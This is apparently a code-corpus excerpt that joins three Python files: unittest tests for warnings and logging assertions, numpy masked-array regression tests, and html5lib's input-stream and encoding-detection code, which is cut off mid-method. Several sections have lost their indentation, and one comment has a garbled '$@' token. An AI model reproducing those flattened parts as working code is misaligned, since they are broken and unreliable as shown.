        NOTE: the cm.lineno assertion requires warnings.warn() to be exactly
        one line below the def of _runtime_warn — do not insert lines there.
        """
        # Believe it or not, it is preferable to duplicate all tests above,
        # to make sure the __warningregistry__ $@ is circumvented correctly.
        def _runtime_warn():
            warnings.warn("foo", RuntimeWarning)
        _runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
        with self.assertWarns(RuntimeWarning) as cm:
            _runtime_warn()
        # A tuple of warning classes is accepted
        with self.assertWarns((DeprecationWarning, RuntimeWarning)) as cm:
            _runtime_warn()
        # The context manager exposes various useful attributes
        self.assertIsInstance(cm.warning, RuntimeWarning)
        self.assertEqual(cm.warning.args[0], "foo")
        self.assertIn("test_case.py", cm.filename)
        self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
        # Same with several warnings
        with self.assertWarns(RuntimeWarning):
            _runtime_warn()
            _runtime_warn()
        with self.assertWarns(RuntimeWarning):
            warnings.warn("foo", category=RuntimeWarning)
        # Failure when no warning is triggered
        with self.assertRaises(self.failureException):
            with self.assertWarns(RuntimeWarning):
                pass
        # Failure when another warning is triggered
        with warnings.catch_warnings():
            # Force default filter (in case tests are run with -We)
            warnings.simplefilter("default", RuntimeWarning)
            with self.assertRaises(self.failureException):
                with self.assertWarns(DeprecationWarning):
                    _runtime_warn()
        # Filters for other warnings are not modified
        with warnings.catch_warnings():
            warnings.simplefilter("error", RuntimeWarning)
            with self.assertRaises(RuntimeWarning):
                with self.assertWarns(DeprecationWarning):
                    _runtime_warn()
    def testAssertWarnsRegexCallable(self):
        """assertWarnsRegex (callable form) requires both the warning class
        and a message matching the pattern."""
        def _runtime_warn(msg):
            warnings.warn(msg, RuntimeWarning)
        self.assertWarnsRegex(RuntimeWarning, "o+",
                              _runtime_warn, "foox")
        # Failure when no warning is triggered
        with self.assertRaises(self.failureException):
            self.assertWarnsRegex(RuntimeWarning, "o+",
                                  lambda: 0)
        # Failure when another warning is triggered
        with warnings.catch_warnings():
            # Force default filter (in case tests are run with -We)
            warnings.simplefilter("default", RuntimeWarning)
            with self.assertRaises(self.failureException):
                self.assertWarnsRegex(DeprecationWarning, "o+",
                                      _runtime_warn, "foox")
        # Failure when message doesn't match
        with self.assertRaises(self.failureException):
            self.assertWarnsRegex(RuntimeWarning, "o+",
                                  _runtime_warn, "barz")
        # A little trickier: we ask RuntimeWarnings to be raised, and then
        # check for some of them.  It is implementation-defined whether
        # non-matching RuntimeWarnings are simply re-raised, or produce a
        # failureException.
        with warnings.catch_warnings():
            warnings.simplefilter("error", RuntimeWarning)
            with self.assertRaises((RuntimeWarning, self.failureException)):
                self.assertWarnsRegex(RuntimeWarning, "o+",
                                      _runtime_warn, "barz")
    def testAssertWarnsRegexContext(self):
        """Same as the callable form, but with assertWarnsRegex as a context
        manager, and checking the exposed cm attributes.

        NOTE: the cm.lineno assertion requires warnings.warn() to be exactly
        one line below the def of _runtime_warn — do not insert lines there.
        """
        # Same as above, but with assertWarnsRegex as a context manager
        def _runtime_warn(msg):
            warnings.warn(msg, RuntimeWarning)
        _runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
        with self.assertWarnsRegex(RuntimeWarning, "o+") as cm:
            _runtime_warn("foox")
        self.assertIsInstance(cm.warning, RuntimeWarning)
        self.assertEqual(cm.warning.args[0], "foox")
        self.assertIn("test_case.py", cm.filename)
        self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
        # Failure when no warning is triggered
        with self.assertRaises(self.failureException):
            with self.assertWarnsRegex(RuntimeWarning, "o+"):
                pass
        # Failure when another warning is triggered
        with warnings.catch_warnings():
            # Force default filter (in case tests are run with -We)
            warnings.simplefilter("default", RuntimeWarning)
            with self.assertRaises(self.failureException):
                with self.assertWarnsRegex(DeprecationWarning, "o+"):
                    _runtime_warn("foox")
        # Failure when message doesn't match
        with self.assertRaises(self.failureException):
            with self.assertWarnsRegex(RuntimeWarning, "o+"):
                _runtime_warn("barz")
        # A little trickier: we ask RuntimeWarnings to be raised, and then
        # check for some of them.  It is implementation-defined whether
        # non-matching RuntimeWarnings are simply re-raised, or produce a
        # failureException.
        with warnings.catch_warnings():
            warnings.simplefilter("error", RuntimeWarning)
            with self.assertRaises((RuntimeWarning, self.failureException)):
                with self.assertWarnsRegex(RuntimeWarning, "o+"):
                    _runtime_warn("barz")
    @contextlib.contextmanager
    def assertNoStderr(self):
        """Context manager asserting that the with-block writes nothing to stderr."""
        with captured_stderr() as buf:
            yield
        self.assertEqual(buf.getvalue(), "")
    def assertLogRecords(self, records, matches):
        """Assert *records* is a list of LogRecords whose attributes match,
        pairwise, the attribute dicts in *matches*."""
        self.assertEqual(len(records), len(matches))
        for rec, match in zip(records, matches):
            self.assertIsInstance(rec, logging.LogRecord)
            for k, v in match.items():
                self.assertEqual(getattr(rec, k), v)
    def testAssertLogsDefaults(self):
        """assertLogs() with no arguments captures the root logger at INFO,
        so a DEBUG message is filtered out."""
        # defaults: root logger, level INFO
        with self.assertNoStderr():
            with self.assertLogs() as cm:
                log_foo.info("1")
                log_foobar.debug("2")
            self.assertEqual(cm.output, ["INFO:foo:1"])
            self.assertLogRecords(cm.records, [{'name': 'foo'}])
    def testAssertLogsTwoMatchingMessages(self):
        """assertLogs() collects every message at or above its level,
        still filtering out DEBUG under the default INFO threshold."""
        # Same, but with two matching log messages
        with self.assertNoStderr():
            with self.assertLogs() as cm:
                log_foo.info("1")
                log_foobar.debug("2")
                log_quux.warning("3")
            self.assertEqual(cm.output, ["INFO:foo:1", "WARNING:quux:3"])
            self.assertLogRecords(cm.records,
                                  [{'name': 'foo'}, {'name': 'quux'}])
    def checkAssertLogsPerLevel(self, level):
        """Helper: assertLogs(level=...) drops records below *level*
        (WARNING here) and keeps ERROR and CRITICAL."""
        # Check level filtering
        with self.assertNoStderr():
            with self.assertLogs(level=level) as cm:
                log_foo.warning("1")
                log_foobar.error("2")
                log_quux.critical("3")
            self.assertEqual(cm.output, ["ERROR:foo.bar:2", "CRITICAL:quux:3"])
            self.assertLogRecords(cm.records,
                                  [{'name': 'foo.bar'}, {'name': 'quux'}])
def testAssertLogsPerLevel(self):
self.checkAssertLogsPerLevel(logging.ERROR)
self.checkAssertLogsPerLevel('ERROR')
    def checkAssertLogsPerLogger(self, logger):
        """Helper: assertLogs(logger) only captures that logger's subtree;
        records from other loggers fall through to an enclosing assertLogs."""
        # Check per-logger filtering
        with self.assertNoStderr():
            with self.assertLogs(level='DEBUG') as outer_cm:
                with self.assertLogs(logger, level='DEBUG') as cm:
                    log_foo.info("1")
                    log_foobar.debug("2")
                    log_quux.warning("3")
                self.assertEqual(cm.output, ["INFO:foo:1", "DEBUG:foo.bar:2"])
                self.assertLogRecords(cm.records,
                                      [{'name': 'foo'}, {'name': 'foo.bar'}])
            # The outer catchall caught the quux log
            self.assertEqual(outer_cm.output, ["WARNING:quux:3"])
def testAssertLogsPerLogger(self):
self.checkAssertLogsPerLogger(logging.getLogger('foo'))
self.checkAssertLogsPerLogger('foo')
    def testAssertLogsFailureNoLogs(self):
        """assertLogs fails when the with-block produces no log records."""
        # Failure due to no logs
        with self.assertNoStderr():
            with self.assertRaises(self.failureException):
                with self.assertLogs():
                    pass
    def testAssertLogsFailureLevelTooHigh(self):
        """assertLogs fails when all records fall below the requested level."""
        # Failure due to level too high
        with self.assertNoStderr():
            with self.assertRaises(self.failureException):
                with self.assertLogs(level='WARNING'):
                    log_foo.info("1")
    def testAssertLogsFailureMismatchingLogger(self):
        """assertLogs fails for a non-matching logger, and the record is
        passed through to an enclosing assertLogs."""
        # Failure due to mismatching logger (and the logged message is
        # passed through)
        with self.assertLogs('quux', level='ERROR'):
            with self.assertRaises(self.failureException):
                with self.assertLogs('foo'):
                    log_quux.error("1")
    def testDeprecatedMethodNames(self):
        """
        Test that the deprecated methods raise a DeprecationWarning. See #9424.
        """
        # Each entry pairs a deprecated alias with arguments that make the
        # underlying assertion succeed, so only the warning is exercised.
        old = (
            (self.failIfEqual, (3, 5)),
            (self.assertNotEquals, (3, 5)),
            (self.failUnlessEqual, (3, 3)),
            (self.assertEquals, (3, 3)),
            (self.failUnlessAlmostEqual, (2.0, 2.0)),
            (self.assertAlmostEquals, (2.0, 2.0)),
            (self.failIfAlmostEqual, (3.0, 5.0)),
            (self.assertNotAlmostEquals, (3.0, 5.0)),
            (self.failUnless, (True,)),
            (self.assert_, (True,)),
            (self.failUnlessRaises, (TypeError, lambda _: 3.14 + 'spam')),
            (self.failIf, (False,)),
            (self.assertDictContainsSubset, (dict(a=1, b=2), dict(a=1, b=2, c=3))),
            (self.assertRaisesRegexp, (KeyError, 'foo', lambda: {}['foo'])),
            (self.assertRegexpMatches, ('bar', 'bar')),
        )
        for meth, args in old:
            with self.assertWarns(DeprecationWarning):
                meth(*args)
# disable this test for now. When the version where the fail* methods will
# be removed is decided, re-enable it and update the version
    def _testDeprecatedFailMethods(self):
        """Test that the deprecated fail* methods get removed in 3.x"""
        # Leading underscore keeps this out of test discovery until the
        # removal version is decided (see the comment above this method).
        if sys.version_info[:2] < (3, 3):
            return
        deprecated_names = [
            'failIfEqual', 'failUnlessEqual', 'failUnlessAlmostEqual',
            'failIfAlmostEqual', 'failUnless', 'failUnlessRaises', 'failIf',
            'assertDictContainsSubset',
        ]
        for deprecated_name in deprecated_names:
            with self.assertRaises(AttributeError):
                getattr(self, deprecated_name)  # remove these in 3.x
def testDeepcopy(self):
# Issue: 5660
class TestableTest(unittest.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
# This shouldn't blow up
deepcopy(test)
def testPickle(self):
# Issue 10326
# Can't use TestCase classes defined in Test class as
# pickle does not work with inner classes
test = unittest.TestCase('run')
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
# blew up prior to fix
pickled_test = pickle.dumps(test, protocol=protocol)
unpickled_test = pickle.loads(pickled_test)
self.assertEqual(test, unpickled_test)
# exercise the TestCase instance in a way that will invoke
# the type equality lookup mechanism
unpickled_test.assertEqual(set(), set())
def testKeyboardInterrupt(self):
def _raise(self=None):
raise KeyboardInterrupt
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
with self.assertRaises(KeyboardInterrupt):
klass('test_something').run()
def testSkippingEverywhere(self):
def _skip(self=None):
raise unittest.SkipTest('some reason')
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _skip
class Test2(unittest.TestCase):
setUp = _skip
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _skip
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_skip)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.skipped), 1)
self.assertEqual(result.testsRun, 1)
def testSystemExit(self):
def _raise(self=None):
raise SystemExit
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.testsRun, 1)
    @support.cpython_only
    def testNoCycles(self):
        # A fresh TestCase must not sit in a reference cycle: with the gc
        # disabled, dropping the last strong reference has to free it via
        # refcounting alone, leaving the weakref dead.
        case = unittest.TestCase()
        wr = weakref.ref(case)
        with support.disable_gc():
            del case
        self.assertFalse(wr())
def test_no_exception_leak(self):
# Issue #19880: TestCase.run() should not keep a reference
# to the exception
class MyException(Exception):
ninstance = 0
def __init__(self):
MyException.ninstance += 1
Exception.__init__(self)
def __del__(self):
MyException.ninstance -= 1
class TestCase(unittest.TestCase):
def test1(self):
raise MyException()
@unittest.expectedFailure
def test2(self):
raise MyException()
for method_name in ('test1', 'test2'):
testcase = TestCase(method_name)
testcase.run()
self.assertEqual(MyException.ninstance, 0)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 |
eusi/MissionPlanerHM | Lib/site-packages/numpy/ma/tests/test_regression.py | 60 | 1082 | from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
    # Each method reproduces a historical numpy.ma ticket; completing
    # without raising (plus the explicit asserts) is the regression check.
    def test_masked_array_create(self,level=rlevel):
        """Ticket #17"""
        x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
        assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
    def test_masked_array(self,level=rlevel):
        """Ticket #61"""
        # Scalar data with a mask must construct without error.
        x = np.ma.array(1,mask=[1])
    def test_mem_masked_where(self,level=rlevel):
        """Ticket #62"""
        from numpy.ma import masked_where, MaskType
        a = np.zeros((1,1))
        b = np.zeros(a.shape, MaskType)
        c = masked_where(b,a)
        # Mixed plain/masked arithmetic must not corrupt memory.
        a-c
    def test_masked_array_multiply(self,level=rlevel):
        """Ticket #254"""
        a = np.ma.zeros((4,1))
        a[2,0] = np.ma.masked
        b = np.zeros((4,2))
        # Broadcasting multiply must work in both operand orders.
        a*b
        b*a
    def test_masked_array_repeat(self, level=rlevel):
        """Ticket #271"""
        np.ma.array([1],mask=False).repeat(10)
    def test_masked_array_repr_unicode(self):
        """Ticket #1256"""
        repr(np.ma.array(u"Unicode"))
| gpl-3.0 |
bheesham/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/inputstream.py | 618 | 30855 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from six.moves import http_client
import codecs
import re
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import encodings, ReparseException
from . import utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
try:
from io import BufferedIOBase
except ImportError:
class BufferedIOBase(object):
pass
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
invalid_unicode_re = re.compile("[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uD800-\uDFFF\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]")
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
    """Buffering for streams that do not have buffering of their own
    The buffer is implemented as a list of chunks on the assumption that
    joining many strings will be slow since it is O(n**2)
    """
    def __init__(self, stream):
        self.stream = stream
        self.buffer = []
        # Read position as [chunk index, offset inside that chunk];
        # [-1, 0] means nothing has been buffered yet.
        self.position = [-1, 0] # chunk number, offset
    def tell(self):
        # Absolute offset = lengths of all fully consumed chunks plus the
        # offset within the current chunk.
        pos = 0
        for chunk in self.buffer[:self.position[0]]:
            pos += len(chunk)
        pos += self.position[1]
        return pos
    def seek(self, pos):
        # Seeking is only supported within already-buffered data.
        assert pos <= self._bufferedBytes()
        offset = pos
        i = 0
        while len(self.buffer[i]) < offset:
            offset -= len(self.buffer[i])
            i += 1
        self.position = [i, offset]
    def read(self, bytes):
        # Read from the underlying stream only when the buffer is empty or
        # the position is at its very end; otherwise serve buffered data.
        if not self.buffer:
            return self._readStream(bytes)
        elif (self.position[0] == len(self.buffer) and
              self.position[1] == len(self.buffer[-1])):
            return self._readStream(bytes)
        else:
            return self._readFromBuffer(bytes)
    def _bufferedBytes(self):
        # Total number of bytes currently held across all chunks.
        return sum([len(item) for item in self.buffer])
    def _readStream(self, bytes):
        # Pull a fresh chunk from the wrapped stream and append it,
        # leaving the position at the end of the new chunk.
        data = self.stream.read(bytes)
        self.buffer.append(data)
        self.position[0] += 1
        self.position[1] = len(data)
        return data
    def _readFromBuffer(self, bytes):
        # Serve as much as possible from buffered chunks, then fall back
        # to the underlying stream for any remainder.
        remainingBytes = bytes
        rv = []
        bufferIndex = self.position[0]
        bufferOffset = self.position[1]
        while bufferIndex < len(self.buffer) and remainingBytes != 0:
            assert remainingBytes > 0
            bufferedData = self.buffer[bufferIndex]
            if remainingBytes <= len(bufferedData) - bufferOffset:
                bytesToRead = remainingBytes
                self.position = [bufferIndex, bufferOffset + bytesToRead]
            else:
                bytesToRead = len(bufferedData) - bufferOffset
                self.position = [bufferIndex, len(bufferedData)]
                bufferIndex += 1
            rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
            remainingBytes -= bytesToRead
            bufferOffset = 0
        if remainingBytes:
            rv.append(self._readStream(remainingBytes))
        return b"".join(rv)
def HTMLInputStream(source, encoding=None, parseMeta=True, chardet=True):
    """Factory returning the right stream wrapper for *source*.

    Text sources get an HTMLUnicodeInputStream; byte sources get an
    HTMLBinaryInputStream, which performs encoding detection.
    """
    if isinstance(source, http_client.HTTPResponse):
        # Work around Python bug #20007: read(0) closes the connection.
        # http://bugs.python.org/issue20007
        isUnicode = False
    elif hasattr(source, "read"):
        isUnicode = isinstance(source.read(0), text_type)
    else:
        isUnicode = isinstance(source, text_type)
    if not isUnicode:
        return HTMLBinaryInputStream(source, encoding, parseMeta, chardet)
    if encoding is not None:
        raise TypeError("Cannot explicitly set an encoding with a unicode string")
    return HTMLUnicodeInputStream(source)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
parseMeta - Look for a <meta> element containing encoding information
"""
# Craziness
if len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
self.replaceCharactersRegexp = re.compile("[\uD800-\uDFFF]")
else:
self.reportCharacterErrors = self.characterErrorsUCS2
self.replaceCharactersRegexp = re.compile("([\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF])")
# List of where new lines occur
self.newLines = [0]
self.charEncoding = ("utf-8", "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
self.reportCharacterErrors(data)
# Replace invalid characters
# Note U+0000 is dealt with in the tokenizer
data = self.replaceCharactersRegexp.sub("\ufffd", data)
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for i in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
def charsUntil(self, characters, opposite=False):
""" Returns a string of characters from the stream up to but not
including any character in 'characters' or EOF. 'characters' must be
a container that supports the 'in' method and iteration over its
characters.
"""
# Use a cache of regexps to find the required characters
try:
chars = charsUntilRegEx[(characters, opposite)]
except KeyError:
if __debug__:
for c in characters:
assert(ord(c) < 128)
regex = "".join(["\\x%02x" % ord(c) for c in characters])
if not opposite:
regex = "^%s" % regex
chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
rv = []
while True:
# Find the longest matching prefix
m = chars.match(self.chunk, self.chunkOffset)
if m is None:
# If nothing matched, and it wasn't because we ran out of chunk,
# then stop
if self.chunkOffset != self.chunkSize:
break
else:
end = m.end()
# If not the whole chunk matched, return everything
# up to the part that didn't match
if end != self.chunkSize:
rv.append(self.chunk[self.chunkOffset:end])
self.chunkOffset = end
break
# If the whole remainder of the chunk matched,
# use it all and read the next chunk
rv.append(self.chunk[self.chunkOffset:])
if not self.readChunk():
# Reached EOF
break
r = "".join(rv)
return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
    """Provides a unicode stream of characters to the HTMLTokenizer.
    This class takes care of character encoding and removing or replacing
    incorrect byte-sequences and also provides column and line tracking.
    """
    def __init__(self, source, encoding=None, parseMeta=True, chardet=True):
        """Initialises the HTMLInputStream.
        HTMLInputStream(source, [encoding]) -> Normalized stream from source
        for use by html5lib.
        source can be either a file-object, local filename or a string.
        The optional encoding parameter must be a string that indicates
        the encoding. If specified, that encoding will be used,
        regardless of any BOM or later declaration (such as in a meta
        element)
        parseMeta - Look for a <meta> element containing encoding information
        """
        # Raw Stream - for unicode objects this will encode to utf-8 and set
        # self.charEncoding as appropriate
        self.rawStream = self.openStream(source)
        HTMLUnicodeInputStream.__init__(self, self.rawStream)
        self.charEncoding = (codecName(encoding), "certain")
        # Encoding Information
        # Number of bytes to use when looking for a meta element with
        # encoding information
        self.numBytesMeta = 512
        # Number of bytes to use when using detecting encoding using chardet
        self.numBytesChardet = 100
        # Encoding to use if no other information can be found
        self.defaultEncoding = "windows-1252"
        # Detect encoding iff no explicit "transport level" encoding is supplied
        if (self.charEncoding[0] is None):
            self.charEncoding = self.detectEncoding(parseMeta, chardet)
        # Call superclass
        self.reset()
    def reset(self):
        # Rebuild the decoding reader with the current encoding; bad byte
        # sequences are substituted rather than raising.
        self.dataStream = codecs.getreader(self.charEncoding[0])(self.rawStream,
                                                                 'replace')
        HTMLUnicodeInputStream.reset(self)
    def openStream(self, source):
        """Produces a file object from source.
        source can be either a file object, local filename or a string.
        """
        # Already a file object
        if hasattr(source, 'read'):
            stream = source
        else:
            stream = BytesIO(source)
        try:
            # Probe for seekability; wrap unseekable streams so that the
            # encoding-detection rewinds below are possible.
            stream.seek(stream.tell())
        except Exception:
            stream = BufferedStream(stream)
        return stream
    def detectEncoding(self, parseMeta=True, chardet=True):
        """Determine (encoding, confidence) from BOM, <meta>, chardet, or
        the default, in that order of preference."""
        # First look for a BOM
        # This will also read past the BOM if present
        encoding = self.detectBOM()
        confidence = "certain"
        # If there is no BOM need to look for meta elements with encoding
        # information
        if encoding is None and parseMeta:
            encoding = self.detectEncodingMeta()
            confidence = "tentative"
        # Guess with chardet, if available
        if encoding is None and chardet:
            confidence = "tentative"
            try:
                try:
                    from charade.universaldetector import UniversalDetector
                except ImportError:
                    from chardet.universaldetector import UniversalDetector
                buffers = []
                detector = UniversalDetector()
                while not detector.done:
                    buffer = self.rawStream.read(self.numBytesChardet)
                    assert isinstance(buffer, bytes)
                    if not buffer:
                        break
                    buffers.append(buffer)
                    detector.feed(buffer)
                detector.close()
                encoding = detector.result['encoding']
                self.rawStream.seek(0)
            except ImportError:
                pass
        # If all else fails use the default encoding
        if encoding is None:
            confidence = "tentative"
            encoding = self.defaultEncoding
        # Substitute for equivalent encodings:
        encodingSub = {"iso-8859-1": "windows-1252"}
        if encoding.lower() in encodingSub:
            encoding = encodingSub[encoding.lower()]
        return encoding, confidence
    def changeEncoding(self, newEncoding):
        """Switch to *newEncoding*, raising ReparseException when the
        document has to be reparsed from the start under the new codec."""
        assert self.charEncoding[1] != "certain"
        newEncoding = codecName(newEncoding)
        if newEncoding in ("utf-16", "utf-16-be", "utf-16-le"):
            newEncoding = "utf-8"
        if newEncoding is None:
            return
        elif newEncoding == self.charEncoding[0]:
            self.charEncoding = (self.charEncoding[0], "certain")
        else:
            # Capture the outgoing encoding before it is overwritten so the
            # exception message is "from <old> to <new>" (previously it
            # reported the new encoding twice).
            oldEncoding = self.charEncoding[0]
            self.rawStream.seek(0)
            # Record the new encoding *before* reset() so the re-created
            # dataStream decodes with the new codec, not the old one.
            self.charEncoding = (newEncoding, "certain")
            self.reset()
            raise ReparseException("Encoding changed from %s to %s" % (oldEncoding, newEncoding))
    def detectBOM(self):
        """Attempts to detect at BOM at the start of the stream. If
        an encoding can be determined from the BOM return the name of the
        encoding otherwise return None"""
        bomDict = {
            codecs.BOM_UTF8: 'utf-8',
            codecs.BOM_UTF16_LE: 'utf-16-le', codecs.BOM_UTF16_BE: 'utf-16-be',
            codecs.BOM_UTF32_LE: 'utf-32-le', codecs.BOM_UTF32_BE: 'utf-32-be'
        }
        # Go to beginning of file and read in 4 bytes
        string = self.rawStream.read(4)
        assert isinstance(string, bytes)
        # Try detecting the BOM using bytes from the string
        encoding = bomDict.get(string[:3]) # UTF-8
        seek = 3
        if not encoding:
            # Need to detect UTF-32 before UTF-16
            encoding = bomDict.get(string) # UTF-32
            seek = 4
            if not encoding:
                encoding = bomDict.get(string[:2]) # UTF-16
                seek = 2
        # Set the read position past the BOM if one was found, otherwise
        # set it to the start of the stream
        self.rawStream.seek(encoding and seek or 0)
        return encoding
    def detectEncodingMeta(self):
        """Report the encoding declared by the meta element
        """
        buffer = self.rawStream.read(self.numBytesMeta)
        assert isinstance(buffer, bytes)
        parser = EncodingParser(buffer)
        self.rawStream.seek(0)
        encoding = parser.getEncoding()
        # UTF-16 declared in-document is impossible (the prescan is ASCII
        # based), so the spec mandates falling back to UTF-8.
        if encoding in ("utf-16", "utf-16-be", "utf-16-le"):
            encoding = "utf-8"
        return encoding
class EncodingBytes(bytes):
    """String-like object with an associated position and various extra methods
    If the position is ever greater than the string length then an exception is
    raised"""
    def __new__(self, value):
        # Lower-cased at construction so all subsequent matching is
        # case-insensitive.
        assert isinstance(value, bytes)
        return bytes.__new__(self, value.lower())
    def __init__(self, value):
        # Position starts *before* the first byte; the first __next__()
        # call moves it to index 0.
        self._position = -1
    def __iter__(self):
        return self
    def __next__(self):
        p = self._position = self._position + 1
        if p >= len(self):
            raise StopIteration
        elif p < 0:
            raise TypeError
        # Slice (not index) so a length-1 bytes object is returned,
        # never an int.
        return self[p:p + 1]
    def next(self):
        # Py2 compat
        return self.__next__()
    def previous(self):
        # Step the position back one byte and return the byte that was
        # current before the move.
        p = self._position
        if p >= len(self):
            raise StopIteration
        elif p < 0:
